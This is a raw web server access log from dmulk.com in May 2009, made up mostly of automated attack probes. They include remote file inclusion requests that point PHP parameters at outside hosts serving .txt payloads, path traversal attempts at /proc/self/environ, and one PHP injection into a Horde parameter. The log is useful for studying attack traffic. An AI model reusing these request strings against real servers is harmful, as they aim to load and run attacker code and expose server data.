190.144.44.36 - - [19/May/2009:10:35:31 -0700] "GET /logs/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 100191 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:35:41 -0700] "GET /logs/access_080703.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:35:41 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:35:41 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:35:50 -0700] "GET /logs/access_080826.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:35:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:35:52 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:35:52 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:35:52 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:14 -0700] "GET /logs/access_090308.log/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:14 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:14 -0700] "GET /slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:14 -0700] "GET /logs/access_090221.log/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:31 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:31 -0700] "GET /logs/access_090308.log/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:31 -0700] "GET /slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:36:31 -0700] "GET /logs/access_090221.log/slice.php3?GLOBALS[AA_INC_PATH]=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:36:43 -0700] "GET /logs/access_090302.log/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:36:44 -0700] "GET /logs/access_090221.log/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:36:47 -0700] "GET /logs/access_080331.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:36:56 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:36:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:36:56 -0700] "GET /logs/access_080313.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.79.60 - - [19/May/2009:10:37:28 -0700] "GET /bikes/dteel/2008_07_03/?M=D HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:37:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:37:42 -0700] "GET /logs/access_080409.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.79.60 - - [19/May/2009:10:38:10 -0700] "GET /logs/access_081220.log HTTP/1.0" 200 3827954 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:14 -0700] "GET /logs//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:15 -0700] "GET /index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:38:17 -0700] "GET /logs/access_080502.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:38:17 -0700] "GET /logs/access_080226.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:20 -0700] "GET /logs/access_090214.log%20%20//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:36 -0700] "GET /logs/access_080425.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:37 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:39 -0700] "GET /logs/access_090214.log//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:39 -0700] "GET /logs//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:38:40 -0700] "GET /index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:41 -0700] "GET /logs/access_080724.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:43 -0700] "GET /logs/access_080425.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:44 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:38:48 -0700] "GET /logs/access_080724.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:38:53 -0700] "GET /logs/access_080523.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:38:53 -0700] "GET /logs/access_090118.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:38:57 -0700] "GET /logs/access_090508.log/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:39:01 -0700] "GET /logs/access_090120.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:39:01 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:39:01 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:39:01 -0700] "GET /logs/access_090117.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:39:05 -0700] "GET /path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:39:05 -0700] "GET /logs/access_080313.log/path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:39:05 -0700] "GET /logs/path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.79.60 - - [19/May/2009:10:39:18 -0700] "GET /logs/access_090228.log HTTP/1.0" 200 3499807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:39:28 -0700] "GET /logs/access_090506.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:39:31 -0700] "GET /logs/access_080126.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:31 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:31 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:31 -0700] "GET /include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:32 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:32 -0700] "GET /include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:33 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:36 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:39:37 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:39:59 -0700] "GET /logs/access_081124.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:40:03 -0700] "GET /logs/access_080506.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:40:48 -0700] "GET /logs/access_080906.log/e404.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:40:48 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:40:48 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:40:53 -0700] "GET /logs/access_090228.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:41:00 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:02 -0700] "GET /logs/access_071224.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:41:10 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:41:10 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:13 -0700] "GET /logs/access_080531.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:19 -0700] "GET /logs/access_080115.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:19 -0700] "GET /logs/access_080522.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:41:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:41:19 -0700] "GET /skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.73.8.201 - - [19/May/2009:10:41:20 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:41:25 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:41:33 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:41:33 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:41 -0700] "GET /logs/access_080409.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:41 -0700] "GET /logs/access_080502.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:41 -0700] "GET /logs/access_080226.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:41:42 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:41:42 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:51 -0700] "GET /logs/access_080523.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:51 -0700] "GET /logs/access_090118.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:51 -0700] "GET /logs/access_080126.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:41:51 -0700] "GET /logs/access_090506.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:42:14 -0700] "GET /logs/access_081124.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:42:14 -0700] "GET /logs/demo1/auction_confirmation.inc.php/header.php?prefix=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:18 -0700] "GET /logs/access_081124.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:18 -0700] "GET /logs/access_081210.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:42:19 -0700] "GET /demo1/auction_confirmation.inc.php/header.php?prefix=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:23 -0700] "GET /logs/access_090318.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:23 -0700] "GET /logs/access_080922.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:42:24 -0700] "GET /logs/access_090214.log//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:42:24 -0700] "GET /index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:42:28 -0700] "GET /logs//index.php?option=com_docman&task=searchform&Itemid=92/index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:30 -0700] "GET /logs/access_071122.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:30 -0700] "GET /logs/access_080626.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:42:38 -0700] "GET /logs/access_080411.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:10:43:27 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:10:43:28 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.4.197.19 - - [19/May/2009:10:43:30 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "dmulk.com"
217.172.168.63 - - [19/May/2009:10:43:31 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
